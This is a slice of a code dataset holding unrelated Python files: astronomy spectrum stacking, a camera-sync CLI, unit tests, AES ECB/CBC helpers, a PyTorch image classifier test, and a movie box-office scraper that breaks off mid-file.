Please refer to the `~gammapy.irf.IRFStacker` for the description\n of how the IRFs are stacked.\n\n Parameters\n ----------\n obs_list : list of `~gammapy.spectrum.SpectrumDatasetOnOff`\n Observations to stack\n\n Examples\n --------\n >>> from gammapy.spectrum import SpectrumDatasetOnOff, SpectrumDatasetOnOffStacker\n >>> obs_ids = [23523, 23526, 23559, 23592]\n >>> datasets = []\n >>> for obs in obs_ids:\n >>> filename = \"$GAMMAPY_DATA/joint-crab/spectra/hess/pha_obs{}.fits\"\n >>> ds = SpectrumDatasetOnOff.from_ogip_files(filename.format(obs))\n >>> datasets.append(ds)\n >>> obs_stacker = SpectrumDatasetOnOffStacker(datasets)\n >>> stacked = obs_stacker.run()\n >>> print(stacked.livetime)\n 6313.8116406202325 s\n \"\"\"\n\n def __init__(self, obs_list):\n self.obs_list = obs_list\n self.stacked_on_vector = None\n self.stacked_off_vector = None\n self.stacked_aeff = None\n self.stacked_edisp = None\n self.stacked_bkscal_on = None\n self.stacked_bkscal_off = None\n self.stacked_obs = None\n self.stacked_gti = None\n\n def __str__(self):\n ss = self.__class__.__name__\n ss += \"\\n{}\".format(self.obs_list)\n return ss\n\n def run(self):\n \"\"\"Run all steps in the correct order.\"\"\"\n self.stack_counts_vectors()\n self.stack_aeff()\n self.stack_edisp()\n self.stack_gti()\n self.stack_obs()\n return self.stacked_obs\n\n def stack_counts_vectors(self):\n \"\"\"Stack on and off vectors.\"\"\"\n self.stack_on_vector()\n self.stack_off_vector()\n self.stack_backscal()\n self.setup_counts_vectors()\n\n def stack_on_vector(self):\n \"\"\"Stack the on count vector.\"\"\"\n on_vector_list = [o.counts for o in self.obs_list]\n self.stacked_on_vector = self.stack_counts_spectrum(on_vector_list)\n\n def stack_off_vector(self):\n \"\"\"Stack the off count vector.\"\"\"\n off_vector_list = [o.counts_off for o in self.obs_list]\n self.stacked_off_vector = self.stack_counts_spectrum(off_vector_list)\n\n def stack_counts_spectrum(self, counts_spectrum_list):\n \"\"\"Stack `~gammapy.spectrum.CountsSpectrum`.\n\n * Bins outside the safe energy range are set to 0\n * Attributes are set to None.\n * The quality vector of the observations are combined with a logical or,\n such that the low (high) threshold of the stacked obs is the minimum\n low (maximum high) threshold of the observation list to be stacked.\n \"\"\"\n template = counts_spectrum_list[0].copy()\n energy = template.energy\n stacked_data = np.zeros(energy.nbin)\n stacked_quality = np.ones(energy.nbin)\n for spec, obs in zip(counts_spectrum_list, self.obs_list):\n stacked_data[obs.mask_safe] += spec.data[obs.mask_safe]\n temp = np.logical_and(stacked_quality, ~obs.mask_safe)\n stacked_quality = np.array(temp, dtype=int)\n\n self.stacked_quality = stacked_quality\n return CountsSpectrum(\n data=stacked_data, energy_lo=energy.edges[:-1], energy_hi=energy.edges[1:]\n )\n\n def stack_backscal(self):\n \"\"\"Stack ``backscal`` for on and off vector.\"\"\"\n nbins = self.obs_list[0].counts.energy.nbin\n bkscal_on = np.ones(nbins)\n bkscal_off = np.zeros(nbins)\n\n alpha_sum = 0.0\n\n for obs in self.obs_list:\n bkscal_off[obs.mask_safe] += (obs.alpha * obs.counts_off.data)[\n obs.mask_safe\n ]\n alpha_sum += (obs.alpha * obs.counts_off.data)[obs.mask_safe].sum()\n\n with np.errstate(divide=\"ignore\", invalid=\"ignore\"):\n stacked_bkscal_off = self.stacked_off_vector.data / bkscal_off\n alpha_average = (\n alpha_sum / self.stacked_off_vector.data[obs.mask_safe].sum()\n )\n\n # there should be no nan values in backscal_on or backscal_off\n # this leads to problems when fitting the data\n # use 1 for backscale of on_vector and 1 / alpha_average for backscale of off_vector\n alpha_correction = 1\n idx = np.where(self.stacked_off_vector.data == 0)[0]\n bkscal_on[idx] = alpha_correction\n # For the bins where the stacked OFF counts equal 0, the alpha value is performed by weighting on the total\n # OFF counts of each run\n stacked_bkscal_off[idx] = alpha_correction / alpha_average\n\n self.stacked_bkscal_on = bkscal_on\n self.stacked_bkscal_off = stacked_bkscal_off\n\n def setup_counts_vectors(self):\n \"\"\"Add correct attributes to stacked counts vectors.\"\"\"\n livetimes = [obs.livetime.to_value(\"s\") for obs in self.obs_list]\n self.total_livetime = u.Quantity(np.sum(livetimes), \"s\")\n\n self.stacked_on_vector.livetime = self.total_livetime\n self.stacked_off_vector.livetime = self.total_livetime\n self.stacked_on_vector.backscal = self.stacked_bkscal_on\n self.stacked_off_vector.backscal = self.stacked_bkscal_off\n\n def stack_aeff(self):\n \"\"\"Stack effective areas (weighted by livetime).\n\n Calls `gammapy.irf.IRFStacker.stack_aeff`.\n \"\"\"\n irf_stacker = IRFStacker(\n list_aeff=[obs.aeff for obs in self.obs_list],\n list_livetime=[obs.livetime for obs in self.obs_list],\n )\n irf_stacker.stack_aeff()\n self.stacked_aeff = irf_stacker.stacked_aeff\n\n def stack_edisp(self):\n \"\"\"Stack energy dispersion (weighted by exposure).\n\n Calls `~gammapy.irf.IRFStacker.stack_edisp`\n \"\"\"\n irf_stacker = IRFStacker(\n list_aeff=[obs.aeff for obs in self.obs_list],\n list_livetime=[obs.livetime for obs in self.obs_list],\n list_edisp=[obs.edisp for obs in self.obs_list],\n list_low_threshold=[obs.energy_range[0] for obs in self.obs_list],\n list_high_threshold=[obs.energy_range[1] for obs in self.obs_list],\n )\n irf_stacker.stack_edisp()\n self.stacked_edisp = irf_stacker.stacked_edisp\n\n def stack_gti(self):\n \"\"\"Stack GTI\n \"\"\"\n first_gti = self.obs_list[0].gti\n if first_gti is None:\n self.stacked_gti = None\n else:\n stack_gti = first_gti.copy()\n for obs in self.obs_list[1:]:\n stack_gti = stack_gti.stack(obs.gti)\n self.stacked_gti = stack_gti.union()\n\n def stack_obs(self):\n \"\"\"Create stacked `~gammapy.spectrum.SpectrumDatasetOnOff`.\"\"\"\n self.stacked_obs = SpectrumDatasetOnOff(\n counts=self.stacked_on_vector,\n counts_off=self.stacked_off_vector,\n aeff=self.stacked_aeff,\n edisp=self.stacked_edisp,\n livetime=self.total_livetime,\n mask_safe=np.logical_not(self.stacked_quality),\n acceptance=self.stacked_on_vector.backscal,\n acceptance_off=self.stacked_off_vector.backscal,\n obs_id=[obs.obs_id for obs in self.obs_list],\n gti=self.stacked_gti,\n )\n","sub_path":"gammapy/spectrum/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":34040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"121076676","text":"#!/usr/bin/env python3\n# coding: utf_8\n\n\n\"\"\" Command line tool \"\"\"\n\nimport argparse\nimport getpass\nimport os\nfrom argparse import RawTextHelpFormatter\nfrom datetime import datetime\n\nimport colorama\nfrom colorama import Style\nfrom hal.streams.user import UserInput\nfrom models import CanSyncer\n\nDATE_TIME_FORMAT = \"%Y-%m-%d_%H-%M-%S\"\nOUTPUT_LOCATION = os.path.join(\n os.getenv(\"HOME\"),\n \"cansync\",\n datetime.now().strftime(DATE_TIME_FORMAT)\n)\nUSER = UserInput()\nPOSSIBLE_CONVERSION_FORMATS = [\"png\", \"jpg\", \"jpeg\"]\ncolorama.init()\n\n\ndef create_args():\n \"\"\" raise errors if args do not match parameters \"\"\"\n parser = argparse.ArgumentParser(\n usage=\"-n \\n-h for full usage\",\n formatter_class=RawTextHelpFormatter)\n parser.add_argument(\"-i\", dest=\"input_device\",\n help=\"Input device\",\n required=True)\n parser.add_argument(\"-o\", dest=\"output\",\n help=\"Output location\",\n default=OUTPUT_LOCATION,\n required=False)\n parser.add_argument(\"-c\", dest=\"conversion\",\n help=\"If you want to convert pictures from CR2 format\",\n required=False)\n parser.add_argument(\"-e\", dest=\"erase_after\",\n help=\"If you want to erase pictures from device \"\n \"after sync\", required=False)\n return parser\n\n\ndef parse_args(parser):\n \"\"\"\n :param parser: ArgumentParser\n Object that holds cmd arguments.\n :return: tuple\n Values of arguments.\n \"\"\"\n\n args = parser.parse_args()\n\n input_device, output_location, erase_after = \\\n args.input_device, args.output, args.erase_after\n\n input_device = os.path.join(\n \"/media\", getpass.getuser(), input_device\n )\n if not input_device.endswith(\"/\"):\n input_device += \"/\"\n\n assert os.path.exists(input_device)\n\n if not os.path.exists(output_location):\n os.makedirs(output_location)\n\n try:\n conversion = str(args.conversion)\n assert conversion in POSSIBLE_CONVERSION_FORMATS\n except:\n conversion = False\n\n erase_after = bool(USER.is_yes(erase_after))\n\n return str(input_device), str(output_location), conversion, \\\n erase_after\n\n\n# @handle_exceptions\ndef main():\n input_device, output_location, conversion, erase_after = \\\n parse_args(create_args())\n driver = CanSyncer(input_device, output_location, erase_after, conversion)\n\n if USER.get_yes_no(\"Print and verify settings?\"):\n settings = driver.get_settings()\n command = settings[\"command\"]\n output = settings[\"output\"]\n input_device = settings[\"input\"]\n erase = settings[\"erase\"]\n convert = settings[\"convert\"]\n\n pairs = [\n (\"COMMAND\", command),\n (\"OUTPUT\", output),\n (\"INPUT\", input_device),\n (\"ERASE ?\", erase),\n (\"CONVERT ?\", convert)\n ]\n for pair in pairs:\n print(Style.BRIGHT + pair[0] + Style.RESET_ALL + \":\")\n print(\"\\t\", pair[1], \"\\n\")\n\n if USER.get_yes_no(\"Are you sure to continue?\"): # start syncing\n driver.run()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cansync/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"83697119","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n## Build the File Loading Operator, and allows for File Selection\n# By Matti 'Menithal' Lahtinen\n\nimport bpy\n\nimport json\nimport os\n\nfrom hifi_tools.world.scene import *\n\n\ndef load_file(operator, context, filepath=\"\",\n uv_sphere= False,\n join_children=True, \n merge_distance = 0.01, \n delete_interior_faces = True,\n use_boolean_operation = 'NONE'):\n \n json_data = open(filepath).read()\n data = json.loads(json_data)\n \n scene = HifiScene(data, uv_sphere, join_children, merge_distance, delete_interior_faces, use_boolean_operation)\n return {\"FINISHED\"}\n\n","sub_path":"All_In_One/addons/hifi_tools/files/hifi_json/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"444481923","text":"import unittest\nfrom pydown import heading\n\nimport re\n\nclass HeadingTest(unittest.TestCase):\n\n def test_h1_heading_is_rendered_correctly(self):\n input = 'some heading\\n='\n \n output = heading.render_h1_headings(input)\n\n self.assertEquals(output, '

some heading

')\n\n def test_h2_heading_is_rendered_correctly(self):\n input = 'some heading\\n-'\n \n output = heading.render_h2_headings(input)\n\n self.assertEquals(output, '

some heading

')\n \n\n def test_all_headings_are_created_correctly(self):\n input = '''\\\nh1 heading 1\n==\n\nh2 heading 1\n-\n\nh2 heading 2\n-\nh1 heading 2\n==='''\n\n output = heading.render_headings(input)\n\n matches = re.findall('h1 heading 1','

h1 heading 2

']\n self.assertEquals(matches, expected)\n\n matches = re.findall('h2 heading 1','

h2 heading 2

']\n self.assertEquals(matches, expected)\n\n\n def test_should_not_modify_non_heading_lines(self):\n input = 'this is not a heading lol\\n\\nneither is this'\n\n output = heading.render_headings(input)\n\n self.assertEquals(output, input)\n","sub_path":"test/test_heading.py","file_name":"test_heading.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"173653351","text":"import sys\nimport random\n\nprint(sys.argv)\n\nif len(sys.argv) < 3:\n print(\"Fucked some command line arguments.\\nIt should be number of points and the filename.\")\n exit()\n\nquantity = int(sys.argv[1])\nfile = sys.argv[2]\n\noutput = ''\nfor d in range(1, quantity):\n output += \"{0}\\t{1}\\t{2}\\t{3}\\n\".format(str(d), str(random.random()), str(random.random()), str(random.random()))\n\nwith open(file, \"w\") as misery:\n misery.writelines(output)\n","sub_path":"PointGenerator.py","file_name":"PointGenerator.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"300896683","text":"\"\"\"Result of difference analysis.\"\"\"\n\nfrom enum import IntEnum\n\n\nclass Result:\n \"\"\"\n Result of a difference analysis.\n Contains the compared entities (functions, params, etc.) and optionally\n contains a list of results of underlying entities (e.g. called functions).\n \"\"\"\n class Kind(IntEnum):\n \"\"\"\n Enumeration type for possible kinds of analysis results.\n Sorted by priority for result aggregation.\n \"\"\"\n NONE = 0\n EQUAL = 1\n ASSUMED_EQUAL = 2\n NOT_EQUAL = 3\n UNKNOWN = 4\n TIMEOUT = 5\n ERROR = 6\n\n @staticmethod\n def from_string(string):\n dictionary = {\n \"none\": Result.Kind.NONE,\n \"equal\": Result.Kind.EQUAL,\n \"assumed-equal\": Result.Kind.ASSUMED_EQUAL,\n \"not-equal\": Result.Kind.NOT_EQUAL,\n \"unknown\": Result.Kind.UNKNOWN,\n \"timeout\": Result.Kind.TIMEOUT,\n \"error\": Result.Kind.ERROR\n }\n return dictionary[string]\n\n def __str__(self):\n return self.name.lower().replace(\"_\", \" \")\n\n class Entity:\n \"\"\"\n Compared entity information. This can be e.g. a function, a module,\n or a parameter.\n If it is a function, it contains the file of the function.\n \"\"\"\n def __init__(self, name, filename=None, line=None, callstack=None,\n diff_kind=\"function\", covered=False):\n self.name = name\n self.filename = filename\n self.line = line\n self.callstack = callstack\n self.diff_kind = diff_kind\n self.covered = covered\n\n def __init__(self, kind, first_name, second_name, start_time=None,\n stop_time=None):\n self.kind = kind\n self.first = Result.Entity(first_name)\n self.second = Result.Entity(second_name)\n self.diff = None\n self.macro_diff = None\n self.graph = None\n self.inner = dict()\n self.start_time = start_time\n self.stop_time = stop_time\n\n def __str__(self):\n return str(self.kind)\n\n def add_inner(self, result):\n \"\"\"\n Add result of an inner entity.\n The overall current result is updated based on the entity result.\n \"\"\"\n self.inner[result.first.name] = result\n # The current result is joined with the inner result (the result with\n # a higher priority is chosen from the two).\n self.kind = Result.Kind(max(int(self.kind), int(result.kind)))\n # The graph of the latest inner result is the graph of the outer one.\n # Note: this is true because the graph is built incrementally, reusing\n # the already known results from the previous comparison.\n self.graph = result.graph\n\n def report_symbol_stat(self, show_errors=False):\n \"\"\"\n Report symbol statistics.\n Print numbers of equal, non-equal, unknown, and error results with\n percentage that each has from the total results.\n \"\"\"\n total = len(self.inner)\n eq = len([r for r in iter(self.inner.values())\n if r.kind == Result.Kind.EQUAL])\n neq = len([r for r in iter(self.inner.values())\n if r.kind == Result.Kind.NOT_EQUAL])\n unkwn = len([r for r in iter(self.inner.values())\n if r.kind == Result.Kind.UNKNOWN])\n errs = len([r for r in iter(self.inner.values())\n if r.kind in [Result.Kind.ERROR, Result.Kind.TIMEOUT]])\n empty_diff = len([r for r in iter(self.inner.values()) if all(map(\n lambda x: x.diff == \"\", r.inner.values())) and\n r.kind == Result.Kind.NOT_EQUAL])\n if total > 0:\n print(\"Total symbols: {}\".format(total))\n print(\"Equal: {0} ({1:.0f}%)\".format(eq, eq / total * 100))\n print(\"Not equal: {0} ({1:.0f}%)\".format(\n neq, neq / total * 100))\n print(\"(empty diff): {0} ({1:.0f}%)\".format(\n empty_diff, empty_diff / total * 100))\n print(\"Unknown: {0} ({1:.0f}%)\".format(unkwn,\n unkwn / total * 100))\n print(\"Errors: {0} ({1:.0f}%)\".format(errs,\n errs / total * 100))\n if show_errors:\n if unkwn > 0:\n print(\"\\nFunctions that are unknown: \")\n for f, r in sorted(self.inner.items()):\n if r.kind == Result.Kind.UNKNOWN:\n print(f)\n print()\n if errs > 0:\n print(\"\\nFunctions whose comparison ended with an error: \")\n for f, r in sorted(self.inner.items()):\n if r.kind == Result.Kind.ERROR:\n print(f)\n print()\n\n def report_object_stat(self):\n \"\"\"\n Report detailed statistics about compared objects.\n Prints the total count of unique non-equal objects (inner diffs)\n excluding those covered by syntax diffs.\n Also prints the count and percentage of those which are function diffs,\n macro diffs, inline asm diffs and empty diffs.\n \"\"\"\n # Wrapper class to store in set\n class UniqueDiff:\n def __init__(self, res):\n self.res = res\n\n def __eq__(self, other):\n return self.res.first.name == other.res.first.name\n\n def __hash__(self):\n return hash(self.res.first.name)\n\n # Convert inner result to set of unique diffs\n unique_diffs = set()\n for _, inner_res_out in self.inner.items():\n for _, inner_res in inner_res_out.inner.items():\n if (inner_res.diff == \"\" and\n inner_res.first.covered):\n continue\n unique_diffs.add(UniqueDiff(inner_res))\n\n # Generate counts\n compared = len(self.graph.vertices)\n total = len(unique_diffs)\n functions = len([r for r in unique_diffs\n if r.res.first.diff_kind == \"function\"])\n types = len([r for r in unique_diffs\n if r.res.first.diff_kind == \"type\"])\n macros = len([r for r in unique_diffs\n if (r.res.first.diff_kind == \"syntactic\" and\n not r.res.first.name.startswith(\"assembly code\"))])\n asm = len([r for r in unique_diffs\n if (r.res.first.diff_kind == \"syntactic\" and\n r.res.first.name.startswith(\"assembly code\"))])\n empty = len([r for r in unique_diffs if r.res.diff == \"\"])\n\n # Print statistics\n if self.start_time and self.stop_time:\n print(\"Elapsed time: {:.2f} s\".format(\n self.stop_time - self.start_time))\n print(\"Functions compared: {}\".format(compared))\n print(\"Total differences: {}\".format(total))\n if total == 0:\n return\n print(\"In functions: {0} ({1:.0f}%)\".format(functions,\n functions / total * 100))\n print(\"In types: {0} ({1:.0f}%)\".format(types,\n types / total * 100))\n print(\"In macros: {0} ({1:.0f}%)\".format(macros,\n macros / total * 100))\n print(\"In inline assembly code: {0} ({1:.0f}%)\".format(asm,\n asm / total * 100))\n print(\"Empty diffs: {0} ({1:.0f}%)\".format(empty,\n empty / total * 100))\n\n def report_stat(self, show_errors=False):\n \"\"\"Reports all statistics.\"\"\"\n self.report_symbol_stat(show_errors)\n print(\"\")\n self.report_object_stat()\n","sub_path":"diffkemp/semdiff/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":7854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"55908177","text":"import obspython as obs\r\nfrom pprint import pprint\r\n\r\ndef refresh_pressed(props, prop):\r\n print(\"refresh pressed\")\r\n data = vars(obs)\r\n with open('export1.txt','w') as f:\r\n pprint(data,stream=f,width=100)\r\n\r\ndef script_properties():\r\n props = obs.obs_properties_create()\r\n obs.obs_properties_add_button(props, \"button\", \"Refresh\", refresh_pressed)\r\n return props\r\n","sub_path":"src/export_vars.py","file_name":"export_vars.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"143811168","text":"from model import *\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom torch.autograd import Variable\nimport torchvision.transforms as transforms\nfrom PIL import Image\nimport glob\n\nimport sys\nsys.path.append('utils')\nfrom config import LR, LR_DECAY_EPOCH, NUM_EPOCHS, NUM_IMAGES, MOMENTUM, BATCH_SIZE\n\nsys.path.append('scripts')\nfrom breeds.data_loader import dset_classes, dset_loaders, dset_sizes, dsets, transform\n\ndef imshow(inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = inp.numpy().transpose((1, 2, 0))\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.485, 0.456, 0.406])\n inp = std * inp + mean\n plt.imshow(inp)\n if title is not None:\n plt.title(title)\n\ndef visualize_new(listaSlika, model, num_images=NUM_IMAGES):\n\n images_so_far = 0\n fig_num = 1\n\n plt.ioff()\n fig = plt.figure(fig_num)\n path = \"./pics/breeds/newPics/\"\n\n lista = []\n for slika in listaSlika:\n lista.append(transform['test'](slika))\n\n tenzor = torch.stack(lista)\n inputs = Variable(tenzor.cuda())\n outputs = model(inputs)\n _, preds = torch.max(outputs.data, 1)\n\n for j in range(inputs.size()[0]): \n images_so_far += 1\n ax = plt.subplot(num_images//2, 2, images_so_far)\n ax.axis('off')\n ax.set_title('predicted: {}'.format(dset_classes[preds[j]]))\n imshow(inputs.cpu().data[j])\n \n if ((j + 1) % num_images) == 0 or j == inputs.size()[0] - 1:\n fig.savefig(path + str(fig_num) + \"_fig.jpg\")\n plt.close(fig)\n fig_num += 1\n fig = plt.figure(fig_num)\n images_so_far = 0\n\ndef to_np(x):\n return x.data.cpu().numpy()\n\nif __name__ == '__main__':\n model = CNNModel()\n model.cuda().load_state_dict(torch.load('results/breeds/model_breeds.pkl'))\n model.eval()\n\n print(model)\n\n imageList = []\n for filename in glob.glob('testneSlike/*.jpg'):\n im = Image.open(filename)\n imageList.append(im)\n\n visualize_new(imageList, model)\n \n","sub_path":"projekt/scripts/breeds/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"378935629","text":"import cv2\nprint('cv2 version:', cv2.__version__)\ndispW = 640\ndispH = 512\nflip=2\ndef nothing(x):\n pass\ncamNumber = 0\n#cam=cv2.VideoCapture(camSet)\ncam = cv2.VideoCapture(camNumber)\ncv2.namedWindow('FLIRcamera')\ncv2.createTrackbar('xVal','FLIRcamera',0,dispW,nothing)\ncv2.createTrackbar('yVal','FLIRcamera',0,dispH,nothing)\n\nwhile True:\n ret,frame = cam.read()\n xVal = cv2.getTrackbarPos('xVal','FLIRcamera')\n yVal = cv2.getTrackbarPos('yVal','FLIRcamera')\n cv2.circle(frame,(xVal,yVal),5,(255,0,0),-1)\n\n \n print(xVal,yVal)\n cv2.imshow('FLIRcamera',frame)\n cv2.moveWindow('FLIRcamera',0,0)\n if cv2.waitKey(1)==ord('q'):\n break\n\ncam.release()\ncv2.destroyAllWindows()","sub_path":"openCV/openCV7-trackBar.py","file_name":"openCV7-trackBar.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"202173377","text":"import os\n\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\nfrom collections import Counter\n\nfrom fn import *\n\nbackend = default_backend()\n\n# the base aes128 block function\ndef aes_encrypt_block(key, data):\n assert(len(key) == 16)\n assert(len(data) == 16)\n\n cipher = Cipher(algorithms.AES(key), modes.ECB(), backend=backend)\n c = cipher.encryptor()\n return c.update(data) + c.finalize()\n\ndef aes_decrypt_block(key, data):\n assert(len(key) == 16)\n assert(len(data) == 16)\n\n cipher = Cipher(algorithms.AES(key), modes.ECB(), backend=backend)\n d = cipher.decryptor()\n return d.update(data) + d.finalize()\n\n# PKCS#7 padding\ndef pad(data, blocksize):\n missing = blocksize - (len(data) % blocksize)\n\n data = bytearray(data)\n for _ in range(missing):\n data.append(missing)\n return data\n\ndef unpad(data):\n last = data[-1]\n # padding should be all the same byte:\n assert len((set(data[-last:]))) == 1\n return data[:-last]\n\ndef ecb_encrypt(key, data):\n ret = bytearray()\n for chunk in chunky(pad(data, 16), 16):\n ret += aes_encrypt_block(key, chunk)\n return ret\n\ndef ecb_decrypt(key, data):\n ret = bytearray()\n for chunk in chunky(data, 16):\n ret += aes_decrypt_block(key, chunk)\n return unpad(ret)\n\ndef cbc_encrypt(key, iv, data):\n ret = bytearray()\n for chunk in chunky(pad(data, 16), 16):\n ct = aes_encrypt_block(key, xor(chunk, iv))\n iv = ct\n ret += ct\n return ret\n\ndef cbc_decrypt(key, iv, data):\n ret = bytearray()\n for chunk in chunky(data, 16):\n plain = xor(iv,aes_decrypt_block(key, chunk))\n iv = chunk\n ret += plain\n return unpad(ret)\n\n# If a block repeats, it's probably ECB mode:\ndef check_ecb(data):\n chunks=list(chunky(bytes(data),16))\n c = Counter(chunks)\n for f in c:\n if c[f] > 1:\n return True\n return False\n\n# Write a function to generate a random AES key; that's just 16 random bytes.\ndef rkey():\n return os.urandom(16)\n","sub_path":"aes.py","file_name":"aes.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"292927238","text":"#기계를 구입하려 하는데 이 기계는 추가 부품을 장착할 수 있다.\r\n# 추가 부품은 종류당 하나씩만 장착 가능하고, 모든 추가 부품은 동일한 가격을 가진다.\r\n#원래 기계의 가격과 성능, 추가 부품의 가격과 각 부품의 성능이 주어졌을 때,\r\n# 추가 부품을 장착하여 얻을 수 있는 최대 가성비를 정수 부분까지 구하시오(가격 및 성능은 상대적인 값으로 수치화되어 주어진다).\r\nop = 10\r\na = 150\r\nnp = 3\r\nna = [30, 70, 15, 40, 65]\r\n\r\nna.sort(reverse=True)\r\n\r\nfor i in na:\r\n if a / op > (a + i) / (op + np) :\r\n break\r\n else : a +=i ; op += np\r\n\r\nprint(int(a/op))","sub_path":"2 가성비 최대화.py","file_name":"2 가성비 최대화.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"417983770","text":"from django.urls import path\n\nfrom .views import novo_personagem, PersonagemList, PersonagemDetail, DeletePersongem, personagem_selecionado, \\\n duelo, atacar_pve, curar\n\nurlpatterns = [\n path('listar', PersonagemList.as_view(), name='lista_personagens'),\n path('novo', novo_personagem, name='novo_personagem'),\n path('datalhe/', PersonagemDetail.as_view(), name='detalhe_personagem'),\n path('deletar/', DeletePersongem.as_view(), name='deletar_personagem'),\n path('selecionar/', personagem_selecionado, name='selecionado'),\n path('duelo//', duelo, name='duelo'),\n path('atacar_pve/', atacar_pve, name='atacar'),\n path('curar/', curar, name='curar')\n\n]","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"151489233","text":"import requests\nimport os\nimport json\n\nfrom bs4 import BeautifulSoup as bs\nfrom datetime import datetime\n\n\ndef insert_comma(n):\n # 음수일 경우를 고려\n if n[0] == '-':\n return '-' + insert_comma(n[1:])\n if len(n) <= 3:\n return n\n if n.find('.') == -1:\n return insert_comma(n[:-3]) + ',' + n[-3:]\n else:\n return insert_comma(n[:n.find('.')]) + n[n.find('.'):]\n\n\ndef beautify(url, selector):\n response = requests.get(url).text\n bs_response = bs(response, 'html.parser')\n result = bs_response.select_one(selector)\n return result\n \n \ndef trimming(string):\n string = string.replace(u'\\xa0', u' ')\n string = string.replace(u'\\r', u' ')\n \n return string\n\n\ndef get_score_or_0(score):\n if score == None:\n return 0\n else:\n return score.text[7:-1]\n\n\ndef save_data(name, data):\n daily[name] = data\n\n\ndef get_trailer():\n youtubeSearchBaseUrl = \"https://www.youtube.com/results?search_query=\"\n \n if daily['nations'][0]['nationNm'] == '한국':\n youtubeSearchUrl = youtubeSearchBaseUrl + daily[\"movieNm\"] + \" \" + \"예고편\"\n else:\n youtubeSearchUrl = youtubeSearchBaseUrl + daily[\"movieNmEn\"] + \" \" + \"trailer\"\n \n response = requests.get(youtubeSearchUrl).text\n res = bs(response,'html.parser')\n results = res.find_all('a')\n \n for result in results:\n if '/watch?v=' in result.get('href'):\n return result.get('href')[9:]\n \n \ndef single_to_double(string):\n string = string.replace(\"'\",'\"')\n return string\n \n \n\n# BASE\nKOFIC_MOVIE_TOKEN = os.getenv('KOFIC_MOVIE_TOKEN')\nYESTERDAY = int(datetime.today().strftime('%Y%m%d')) - 1\nNAVER_MOVIE_BASE_URL = 'https://movie.naver.com/movie'\n\n\n\n# KOFIC Daily Box Office(DBO)\n# DBO_url = f'http://www.kobis.or.kr/kobisopenapi/webservice/rest/boxoffice/searchDailyBoxOfficeList.json?key={KOFIC_MOVIE_TOKEN}&targetDt=20180713'\n# DBO_url = f'http://www.kobis.or.kr/kobisopenapi/webservice/rest/boxoffice/searchDailyBoxOfficeList.json?key={KOFIC_MOVIE_TOKEN}&targetDt=20180913'\n# DBO_url = f'http://www.kobis.or.kr/kobisopenapi/webservice/rest/boxoffice/searchDailyBoxOfficeList.json?key={KOFIC_MOVIE_TOKEN}&targetDt=20180113'\n# DBO_url = f'http://www.kobis.or.kr/kobisopenapi/webservice/rest/boxoffice/searchDailyBoxOfficeList.json?key={KOFIC_MOVIE_TOKEN}&targetDt=20190313'\nDBO_url = f'http://www.kobis.or.kr/kobisopenapi/webservice/rest/boxoffice/searchDailyBoxOfficeList.json?key={KOFIC_MOVIE_TOKEN}&targetDt=20190513'\nDBO_response = requests.get(DBO_url)\ndaily_lists = DBO_response.json()['boxOfficeResult']['dailyBoxOfficeList'] # JSON File\n\n\n\nfor daily in daily_lists:\n # audiAcc 단위수 조절\n # daily['audiAcc'] = insert_comma(daily['audiAcc'])\n\n\n\n # 영화 데이터 추가\n movie_info_url = f'http://www.kobis.or.kr/kobisopenapi/webservice/rest/movie/searchMovieInfo.json?key={KOFIC_MOVIE_TOKEN}&movieCd={daily[\"movieCd\"]}'\n movie_info_response = requests.get(movie_info_url).json()[\"movieInfoResult\"][\"movieInfo\"]\n daily.update(movie_info_response)\n\n\n\n # 영화 URL 뒷 부분 찾기\n \"\"\" \n ex.\n NAVER_MOVIE_BASE_URL 뒤에 \"/movie/bi/mi/basic.nhn?code=136900\"(어벤져스: 엔드게임)를 